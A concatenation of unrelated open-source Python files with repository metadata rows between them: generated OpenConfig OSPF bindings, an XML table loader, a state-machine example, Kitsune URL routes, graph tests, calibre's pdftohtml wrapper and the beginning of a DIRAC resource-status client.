yang_type="uint8",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """mask must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['0..32']}), is_leaf=True, yang_name="mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=False)""",
}
)
self.__mask = t
if hasattr(self, "_set"):
self._set()
def _unset_mask(self):
self.__mask = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..32"]},
),
is_leaf=True,
yang_name="mask",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
def _get_metric_type(self):
"""
Getter method for metric_type, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/metric_type (enumeration)
YANG Description: The type of metric included within the AS External LSA.
"""
return self.__metric_type
def _set_metric_type(self, v, load=False):
"""
Setter method for metric_type, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/metric_type (enumeration)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric_type() directly.
YANG Description: The type of metric included within the AS External LSA.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"TYPE_1": {}, "TYPE_2": {}},
),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric_type must be of a type compatible with enumeration""",
"defined-type": "openconfig-network-instance:enumeration",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'TYPE_1': {}, 'TYPE_2': {}},), is_leaf=True, yang_name="metric-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='enumeration', is_config=False)""",
}
)
self.__metric_type = t
if hasattr(self, "_set"):
self._set()
def _unset_metric_type(self):
self.__metric_type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"TYPE_1": {}, "TYPE_2": {}},
),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
def _get_metric(self):
"""
Getter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/metric (oc-ospf-types:ospf-metric)
YANG Description: The cost to reach the external network specified. The exact
interpretation of this cost is dependent on the type of
metric specified
"""
return self.__metric
def _set_metric(self, v, load=False):
"""
Setter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/metric (oc-ospf-types:ospf-metric)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric() directly.
YANG Description: The cost to reach the external network specified. The exact
interpretation of this cost is dependent on the type of
metric specified
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric must be of a type compatible with oc-ospf-types:ospf-metric""",
"defined-type": "oc-ospf-types:ospf-metric",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-ospf-types:ospf-metric', is_config=False)""",
}
)
self.__metric = t
if hasattr(self, "_set"):
self._set()
def _unset_metric(self):
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
def _get_forwarding_address(self):
"""
Getter method for forwarding_address, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/forwarding_address (inet:ipv4-address-no-zone)
YANG Description: The destination to which traffic for the external prefix
should be advertised. When this value is set to 0.0.0.0 then
traffic should be forwarded to the LSA's originator
"""
return self.__forwarding_address
def _set_forwarding_address(self, v, load=False):
"""
Setter method for forwarding_address, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/forwarding_address (inet:ipv4-address-no-zone)
If this variable is read-only (config: false) in the
source YANG file, then _set_forwarding_address is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_forwarding_address() directly.
YANG Description: The destination to which traffic for the external prefix
should be advertised. When this value is set to 0.0.0.0 then
traffic should be forwarded to the LSA's originator
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9\\.]*"},
),
is_leaf=True,
yang_name="forwarding-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ipv4-address-no-zone",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """forwarding_address must be of a type compatible with inet:ipv4-address-no-zone""",
"defined-type": "inet:ipv4-address-no-zone",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="forwarding-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)""",
}
)
self.__forwarding_address = t
if hasattr(self, "_set"):
self._set()
def _unset_forwarding_address(self):
self.__forwarding_address = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9\\.]*"},
),
is_leaf=True,
yang_name="forwarding-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ipv4-address-no-zone",
is_config=False,
)
def _get_external_route_tag(self):
"""
Getter method for external_route_tag, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/external_route_tag (uint32)
YANG Description: An opaque tag that set by the LSA originator to carry
information relating to the external route
"""
return self.__external_route_tag
def _set_external_route_tag(self, v, load=False):
"""
Setter method for external_route_tag, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/external_route_tag (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_external_route_tag is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_external_route_tag() directly.
YANG Description: An opaque tag that set by the LSA originator to carry
information relating to the external route
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="external-route-tag",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """external_route_tag must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="external-route-tag", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""",
}
)
self.__external_route_tag = t
if hasattr(self, "_set"):
self._set()
def _unset_external_route_tag(self):
self.__external_route_tag = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="external-route-tag",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
mask = __builtin__.property(_get_mask)
metric_type = __builtin__.property(_get_metric_type)
metric = __builtin__.property(_get_metric)
forwarding_address = __builtin__.property(_get_forwarding_address)
external_route_tag = __builtin__.property(_get_external_route_tag)
_pyangbind_elements = OrderedDict(
[
("mask", mask),
("metric_type", metric_type),
("metric", metric),
("forwarding_address", forwarding_address),
("external_route_tag", external_route_tag),
]
)
| apache-2.0 | -8,142,410,994,552,868,000 | 42.85625 | 643 | 0.561575 | false |
sillygod/my-travel-in-learning-python | databaseProject/DataBase.py | 1 | 2520 | '''
FUNC: read a xml file(database) and transfer it to a list of dictionary type
note: no case sensitive
I will make a rule about the database in xml form
ex.
____________________________
Student |name | ID | score | and ID is a key
|aa | 1 | 10 |
|bb | 2 | 20 |
in XML file, I will use something like the following.
<table name='Student'>
<data>
<name>aa</name>
<ID key='key'>1</ID>
<score>10</score>
</data>
<data>
<name>bb</name>
<ID key='key'>2</ID>
<score>20</score>
</data>
</table>
table data type: a dict contain a dict of list ex. dict[{}:[{}]]
'''
try:
import xml.etree.cElementTree as eTree
except ImportError:
import xml.etree.ElementTree as eTree
# the above, try to find the api implemented by C because of the speed consideration
# but in python3.3, you just type import xml.etree.ElementTree. it will automatically to find the best
class DataBase:
def __init__(self, fileName):
self.Table = {}
self.Tree = eTree.parse(fileName)
self.createTable()
def createTable(self):
''' start to traverse '''
for elem in self.Tree.iter(tag='table'):
tableName=elem.attrib['name'].upper()
self.Table[tableName] = [] # make a table
for data in elem: # enter the each data of table
rowAttribute={} # make a new dict
for attribute in data:
rowAttribute[attribute.tag.upper()]=attribute.text.upper()
self.Table[tableName].append(rowAttribute)
def getTable(self):
''' return a table '''
return self.Table
def findAttribInWhichTable(self, attribName):
result=[]
for key in self.Table:
if attribName in self.Table[key][0]:
result.append(key)
return result
def isTable(self, tableName):
''' check the existence of tableName'''
return tableName in self.Table
def outputTable(self, table):
''' table is a list '''
outputString=''
#dynamic to adjust the alignment?
Alignment = '{:^20}'
isFirstColumn = True
if table == []:
return 'NULL'
order = table[0].keys()
for columnName in order:
if isFirstColumn:
outputString += Alignment.format(columnName)
isFirstColumn = False
else:
outputString += Alignment.format(columnName)
outputString += '\n'
isFirstColumn =True
for data in table:
for attrib in order:
if isFirstColumn:
outputString += Alignment.format(data[attrib])
isFirstColumn = False
else:
outputString += Alignment.format(data[attrib])
isFirstColumn = True
outputString += '\n'
return outputString
| gpl-2.0 | 2,119,482,450,881,611,800 | 23.950495 | 102 | 0.658333 | false |
DarkDruiD/Machinery | Python/Machinery/example.py | 1 | 1470 | import time
import random
from datapath import Datapath
from controller import Delta
from controller import State
from controller import FSMD
def locked_on_enter():
print "Entered locked state"
time.sleep(3)
def locked_on_leave():
pass
locked = State("locked")
locked.on_enter = locked_on_enter
locked.on_leave = locked_on_leave
def unlocked_on_enter():
print "Entered unlocked state"
time.sleep(3)
def unlocked_on_leave():
pass
unlocked = State("unlocked")
unlocked.on_enter = unlocked_on_enter
unlocked.on_leave = unlocked_on_leave
datapath = Datapath()
def read_coin_function():
return random.randint(0, 1)
datapath.add_variable("coin", read_coin_function)
def read_push_function():
return random.randint(0, 1)
datapath.add_variable("push", read_push_function)
state_table = Delta()
def when_pushed(dp):
if dp.get_variable("push"):
return True
return False
state_table.add_transition(
locked,
locked,
when_pushed,
None
)
def when_coined(dp):
if dp.get_variable("coin"):
return True
return False
state_table.add_transition(
locked,
unlocked,
when_coined,
None
)
state_table.add_transition(
unlocked,
unlocked,
when_coined,
None
)
state_table.add_transition(
unlocked,
locked,
when_pushed,
None
)
states = (
locked,
unlocked
)
fmsd = FSMD(states, datapath, state_table, locked)
fmsd.run()
| mit | -3,953,514,065,446,916,000 | 12.125 | 50 | 0.669388 | false |
anushbmx/kitsune | kitsune/users/urls.py | 1 | 4192 | from django.conf import settings
from django.conf.urls import include, url
from django.views.decorators.cache import never_cache
from mozilla_django_oidc.views import OIDCAuthenticationCallbackView
import kitsune.flagit.views
from kitsune.sumo.views import redirect_to
from kitsune.users import api, views
from kitsune.users.models import Profile
# API patterns. All start with /users/api.
api_patterns = [
url(r'^usernames', api.usernames, name='users.api.usernames'),
]
# These will all start with /user/<user_id>/
detail_patterns = [
url(r'^$', views.profile, name='users.profile'),
url(r'^/documents$', views.documents_contributed, name='users.documents'),
url(r'^/edit$', views.edit_profile, name='users.edit_profile'),
# TODO:
# url('^abuse', views.report_abuse, name='users.abuse'),
]
users_patterns = [
url(r'^/auth$', views.user_auth, name='users.auth'),
url(r'^/login$', views.login, name='users.login'),
url(r'^/logout$', views.logout, name='users.logout'),
url(r'^/close_account$', views.close_account, name='users.close_account'),
url(r'^/activate/(?P<activation_key>\w+)$', views.activate,
name='users.old_activate'),
url(r'^/activate/(?P<user_id>\d+)/(?P<activation_key>\w+)$',
views.activate, name='users.activate'),
url(r'^/edit$', views.edit_profile, name='users.edit_my_profile'),
url(r'^/settings$', views.edit_settings, name='users.edit_settings'),
url(r'^/watches$', views.edit_watch_list, name='users.edit_watch_list'),
url(r'^/avatar$', views.edit_avatar, name='users.edit_avatar'),
url(r'^/avatar/delete$', views.delete_avatar, name='users.delete_avatar'),
url(r'^/deactivate$', views.deactivate, name='users.deactivate'),
url(r'^/deactivate-spam$', views.deactivate, {'mark_spam': True},
name='users.deactivate-spam'),
url(r'^/deactivation_log$', views.deactivation_log,
name='users.deactivation_log'),
url(r'^/make_contributor$', views.make_contributor,
name='users.make_contributor'),
# Password reset
url(r'^/pwreset$', views.password_reset, name='users.pw_reset'),
url(r'^/pwresetsent$', views.password_reset_sent,
name='users.pw_reset_sent'),
url(r'^/pwreset/(?P<uidb36>[-\w]+)/(?P<token>[-\w]+)$',
views.password_reset_confirm, name="users.pw_reset_confirm"),
url(r'^/pwresetcomplete$', views.password_reset_complete,
name="users.pw_reset_complete"),
# Forgot username
url(r'^/forgot-username$', views.forgot_username,
name='users.forgot_username'),
# Change password
url(r'^/pwchange$', views.password_change, name='users.pw_change'),
url(r'^/pwchangecomplete$', views.password_change_complete,
name='users.pw_change_complete'),
url(r'^/resendconfirmation$', views.resend_confirmation,
name='users.resend_confirmation'),
# Change email
url(r'^change_email$', redirect_to, {'url': 'users.change_email'},
name='users.old_change_email'),
url(r'^confirm_email/(?P<activation_key>\w+)$',
redirect_to, {'url': 'users.confirm_email'},
name='users.old_confirm_email'),
url(r'^/change_email$', views.change_email, name='users.change_email'),
url(r'^/confirm_email/(?P<activation_key>\w+)$',
views.confirm_change_email, name='users.confirm_email'),
url(r'^/api/', include(api_patterns)),
]
urlpatterns = [
# URLs for a single user.
url(r'^user/(?P<username>[\w@\.\s+-]+)', include(detail_patterns)),
url(r'^user/(?P<object_id>\w+)/flag$', kitsune.flagit.views.flag,
{'model': Profile}, name='users.flag'),
url(r'^users', include(users_patterns)),
]
if settings.OIDC_ENABLE:
urlpatterns += [
url(r'^fxa/callback/$', never_cache(OIDCAuthenticationCallbackView.as_view()),
name='users.fxa_authentication_callback'),
url(r'^fxa/authenticate/$', never_cache(views.FXAAuthenticateView.as_view()),
name='users.fxa_authentication_init'),
url(r'^fxa/logout/$', never_cache(views.FXALogoutView.as_view()),
name='users.fxa_logout_url'),
url(r'^oidc/', include('mozilla_django_oidc.urls')),
]
| bsd-3-clause | 7,517,170,160,506,751,000 | 40.098039 | 86 | 0.649332 | false |
bniemczyk/symbolic | tests/graph.py | 1 | 1719 | import symath
from symath.graph.algorithms import *
import symath.graph.generation as graphgen
import unittest
class TestDirectedGraph(unittest.TestCase):
def setUp(self):
self.x, self.y, self.z, self.w, self.e1, self.e2 = symath.symbols('x y z w e1 e2')
self.g = symath.graph.directed.DirectedGraph()
self.g.connect(self.x, self.y, self.e1)
self.g.connect(self.y, self.z, self.e2)
self.g.connect(self.x, self.y, self.e2)
self.g.connect(self.z, self.w)
self.g.connect(self.x, self.w)
def test_edges(self):
self.assertEqual(len(self.g.nodes[self.x].outgoing), 2)
def test_union(self):
og = symath.graph.directed.DirectedGraph()
og.connect(self.x, symath.symbols('ognode'))
og.union(self.g)
self.assertTrue(og.connectedQ(self.x, self.y))
def test_pathq(self):
self.assertTrue(pathQ(self.g, self.x, self.z))
def test_adj_matrix(self):
mp,m = self.g.adjacency_matrix()
self.assertEqual(m.shape[0], 4)
self.assertEqual(m[mp[self.x],mp[self.y]], 1)
self.assertEqual(m[mp[self.x],mp[self.x]], 0)
def test_random_generation(self):
randg = graphgen.random_graph(100, 0.05)
def test_edgevalue_disconnect(self):
g = symath.graph.directed.DirectedGraph()
g.connect(self.x, self.y, self.e1)
g.connect(self.x, self.y, self.e2)
g.disconnect(self.x, self.y)
self.assertFalse(g.connectedQ(self.x, self.y))
g.connect(self.x, self.y, self.e1)
g.connect(self.x, self.y, self.e2)
g.disconnect(self.x, self.y, self.e1)
self.assertTrue(g.connectedQ(self.x, self.y))
g.disconnect(self.x, self.y, self.e2)
self.assertFalse(g.connectedQ(self.x, self.y))
| bsd-2-clause | 6,984,097,929,951,748,000 | 31.705882 | 86 | 0.655614 | false |
jelly/calibre | src/calibre/ebooks/pdf/pdftohtml.py | 1 | 6990 | # -*- coding: utf-8 -*-
__license__ = 'GPL 3'
__copyright__ = '2008, Kovid Goyal <kovid at kovidgoyal.net>, ' \
'2009, John Schember <[email protected]>'
__docformat__ = 'restructuredtext en'
import errno, os, sys, subprocess, shutil, re
from functools import partial
from calibre.ebooks import ConversionError, DRMError
from calibre.ebooks.chardet import xml_to_unicode
from calibre.ptempfile import PersistentTemporaryFile
from calibre.constants import (isosx, iswindows, islinux, isbsd,
filesystem_encoding)
from calibre import CurrentDir
from calibre.utils.cleantext import clean_xml_chars
PDFTOHTML = 'pdftohtml'
popen = subprocess.Popen
if isosx and hasattr(sys, 'frameworks_dir'):
PDFTOHTML = os.path.join(getattr(sys, 'frameworks_dir'), PDFTOHTML)
if iswindows and hasattr(sys, 'frozen'):
base = sys.extensions_location if hasattr(sys, 'new_app_layout') else os.path.dirname(sys.executable)
PDFTOHTML = os.path.join(base, 'pdftohtml.exe')
popen = partial(subprocess.Popen, creationflags=0x08) # CREATE_NO_WINDOW=0x08 so that no ugly console is popped up
if (islinux or isbsd) and getattr(sys, 'frozen', False):
PDFTOHTML = os.path.join(sys.executables_location, 'bin', 'pdftohtml')
def pdftohtml(output_dir, pdf_path, no_images, as_xml=False):
'''
Convert the pdf into html using the pdftohtml app.
This will write the html as index.html into output_dir.
It will also write all extracted images to the output_dir
'''
pdfsrc = os.path.join(output_dir, u'src.pdf')
index = os.path.join(output_dir, u'index.'+('xml' if as_xml else 'html'))
with open(pdf_path, 'rb') as src, open(pdfsrc, 'wb') as dest:
shutil.copyfileobj(src, dest)
with CurrentDir(output_dir):
# This is necessary as pdftohtml doesn't always (linux) respect
# absolute paths. Also, it allows us to safely pass only bytestring
# arguments to subprocess on widows
# subprocess in python 2 cannot handle unicode arguments on windows
# that cannot be encoded with mbcs. Ensure all args are
# bytestrings.
def a(x):
return os.path.basename(x).encode('ascii')
exe = PDFTOHTML.encode(filesystem_encoding) if isinstance(PDFTOHTML,
unicode) else PDFTOHTML
cmd = [exe, b'-enc', b'UTF-8', b'-noframes', b'-p', b'-nomerge',
b'-nodrm', a(pdfsrc), a(index)]
if isbsd:
cmd.remove(b'-nodrm')
if no_images:
cmd.append(b'-i')
if as_xml:
cmd.append('-xml')
logf = PersistentTemporaryFile(u'pdftohtml_log')
try:
p = popen(cmd, stderr=logf._fd, stdout=logf._fd,
stdin=subprocess.PIPE)
except OSError as err:
if err.errno == errno.ENOENT:
raise ConversionError(
_('Could not find pdftohtml, check it is in your PATH'))
else:
raise
while True:
try:
ret = p.wait()
break
except OSError as e:
if e.errno == errno.EINTR:
continue
else:
raise
logf.flush()
logf.close()
out = open(logf.name, 'rb').read().strip()
if ret != 0:
raise ConversionError(b'pdftohtml failed with return code: %d\n%s' % (ret, out))
if out:
print "pdftohtml log:"
print out
if not os.path.exists(index) or os.stat(index).st_size < 100:
raise DRMError()
if not as_xml:
with lopen(index, 'r+b') as i:
raw = i.read()
raw = flip_images(raw)
raw = '<!-- created by calibre\'s pdftohtml -->\n' + raw
i.seek(0)
i.truncate()
# versions of pdftohtml >= 0.20 output self closing <br> tags, this
# breaks the pdf heuristics regexps, so replace them
raw = raw.replace(b'<br/>', b'<br>')
raw = re.sub(br'<a\s+name=(\d+)', br'<a id="\1"', raw, flags=re.I)
raw = re.sub(br'<a id="(\d+)"', br'<a id="p\1"', raw, flags=re.I)
raw = re.sub(br'<a href="index.html#(\d+)"', br'<a href="#p\1"', raw, flags=re.I)
i.write(raw)
cmd = [exe, b'-f', b'1', '-l', '1', b'-xml', b'-i', b'-enc', b'UTF-8', b'-noframes', b'-p', b'-nomerge',
b'-nodrm', b'-q', b'-stdout', a(pdfsrc)]
p = popen(cmd, stdout=subprocess.PIPE)
raw = p.stdout.read().strip()
if p.wait() == 0 and raw:
parse_outline(raw, output_dir)
if isbsd:
cmd.remove(b'-nodrm')
try:
os.remove(pdfsrc)
except:
pass
def parse_outline(raw, output_dir):
from lxml import etree
from calibre.ebooks.oeb.parse_utils import RECOVER_PARSER
raw = clean_xml_chars(xml_to_unicode(raw, strip_encoding_pats=True, assume_utf8=True)[0])
outline = etree.fromstring(raw, parser=RECOVER_PARSER).xpath('(//outline)[1]')
if outline:
from calibre.ebooks.oeb.polish.toc import TOC, create_ncx
outline = outline[0]
toc = TOC()
count = [0]
def process_node(node, toc):
for child in node.iterdescendants('*'):
if child.tag == 'outline':
parent = toc.children[-1] if toc.children else toc
process_node(child, parent)
else:
page = child.get('page', '1')
toc.add(child.text, 'index.html', 'p' + page)
count[0] += 1
process_node(outline, toc)
if count[0] > 2:
root = create_ncx(toc, (lambda x:x), 'pdftohtml', 'en', 'pdftohtml')
with open(os.path.join(output_dir, 'toc.ncx'), 'wb') as f:
f.write(etree.tostring(root, pretty_print=True, with_tail=False, encoding='utf-8', xml_declaration=True))
def flip_image(img, flip):
from calibre.utils.img import flip_image, image_and_format_from_data, image_to_data
with lopen(img, 'r+b') as f:
img, fmt = image_and_format_from_data(f.read())
img = flip_image(img, horizontal=b'x' in flip, vertical=b'y' in flip)
f.seek(0), f.truncate()
f.write(image_to_data(img, fmt=fmt))
def flip_images(raw):
for match in re.finditer(b'<IMG[^>]+/?>', raw, flags=re.I):
img = match.group()
m = re.search(br'class="(x|y|xy)flip"', img)
if m is None:
continue
flip = m.group(1)
src = re.search(br'src="([^"]+)"', img)
if src is None:
continue
img = src.group(1)
if not os.path.exists(img):
continue
flip_image(img, flip)
raw = re.sub(br'<STYLE.+?</STYLE>\s*', b'', raw, flags=re.I|re.DOTALL)
return raw
| gpl-3.0 | 4,022,858,997,273,561,000 | 37.406593 | 121 | 0.558798 | false |
chaen/DIRAC | ResourceStatusSystem/Client/ResourceStatusClient.py | 1 | 14924 | ''' ResourceStatusClient
Client to interact with the ResourceStatusDB.
'''
# pylint: disable=unused-argument
__RCSID__ = '$Id$'
from DIRAC import S_OK
from DIRAC.Core.Base.Client import Client
from DIRAC.ConfigurationSystem.Client.Helpers.Operations import Operations
from DIRAC.FrameworkSystem.Client.NotificationClient import NotificationClient
from DIRAC.ResourceStatusSystem.Client.ResourceManagementClient import uppercase_first_letter
class ResourceStatusClient(Client):
"""
The :class:`ResourceStatusClient` class exposes the :mod:`DIRAC.ResourceStatus`
API. All functions you need are on this client.
You can use this client on this way
>>> from DIRAC.ResourceStatusSystem.Client.ResourceStatusClient import ResourceStatusClient
>>> rsClient = ResourceStatusClient()
"""
def __init__(self, **kwargs):
super(ResourceStatusClient, self).__init__(**kwargs)
self.setServer('ResourceStatus/ResourceStatus')
def _prepare(self, sendDict):
# remove unnecessary key generated by locals()
del sendDict['self']
del sendDict['element']
del sendDict['tableType']
# make each key name uppercase to match database column names (case sensitive)
for key, value in sendDict.items():
del sendDict[key]
if value:
sendDict.update({uppercase_first_letter(key): value})
return sendDict
def insert(self, tableName, record):
"""
Insert a dictionary `record` as a row in table `tableName`
:param str tableName: the name of the table
:param dict record: dictionary of record to insert in the table
:return: S_OK() || S_ERROR()
"""
return self._getRPC().insert(tableName, record)
def select(self, tableName, params=None):
"""
Select rows from the table `tableName`
:param str tableName: the name of the table
:param dict record: dictionary of the selection parameters
:return: S_OK() || S_ERROR()
"""
if params is None:
params = {}
return self._getRPC().select(tableName, params)
def delete(self, tableName, params=None):
"""
Delect rows from the table `tableName`
:param str tableName: the name of the table
:param dict record: dictionary of the deletion parameters
:Returns:
S_OK() || S_ERROR()
"""
if params is None:
params = {}
return self._getRPC().delete(tableName, params)
################################################################################
# Element status methods - enjoy !
def insertStatusElement(self, element, tableType, name, statusType, status,
elementType, reason, dateEffective, lastCheckTime,
tokenOwner, tokenExpiration=None):
'''
Inserts on <element><tableType> a new row with the arguments given.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `string`
name of the individual of class element
**statusType** - `string`
it has to be a valid status type for the element class
**status** - `string`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `string`
column to distinguish between the different elements in the same element
table.
**reason** - `string`
decision that triggered the assigned status
**dateEffective** - `datetime`
time-stamp from which the status & status type are effective
**lastCheckTime** - `datetime`
time-stamp setting last time the status & status were checked
**tokenOwner** - `string`
token assigned to the site & status type
**tokenExpiration** - `datetime`
time-stamp setting validity of token ownership
:return: S_OK() || S_ERROR()
'''
return self._getRPC().insert(element + tableType, self._prepare(locals()))
def selectStatusElement(self, element, tableType, name=None, statusType=None,
status=None, elementType=None, reason=None,
dateEffective=None, lastCheckTime=None,
tokenOwner=None, tokenExpiration=None, meta=None):
'''
Gets from <element><tableType> all rows that match the parameters given.
:Parameters:
**element** - `string`
it has to be a valid element ( ValidElement ), any of the defaults: `Site` \
| `Resource` | `Node`
**tableType** - `string`
it has to be a valid tableType [ 'Status', 'Log', 'History' ]
**name** - `[, string, list]`
name of the individual of class element
**statusType** - `[, string, list]`
it has to be a valid status type for the element class
**status** - `[, string, list]`
it has to be a valid status, any of the defaults: `Active` | `Degraded` | \
`Probing` | `Banned`
**elementType** - `[, string, list]`
column to distinguish between the different elements in the same element
table.
**reason** - `[, string, list]`
decision that triggered the assigned status
**dateEffective** - `[, datetime, list]`
time-stamp from which the status & status type are effective
**lastCheckTime** - `[, datetime, list]`
time-stamp setting last time the status & status were checked
**tokenOwner** - `[, string, list]`
token assigned to the site & status type
**tokenExpiration** - `[, datetime, list]`
time-stamp setting validity of token ownership
**meta** - `dict`
metadata for the mysql query. Currently it is being used only for column selection.
For example: meta = { 'columns' : [ 'Name' ] } will return only the 'Name' column.
:return: S_OK() || S_ERROR()
'''
return self._getRPC().select(element + tableType, self._prepare(locals()))
def deleteStatusElement(self, element, tableType, name=None, statusType=None,
status=None, elementType=None, reason=None,
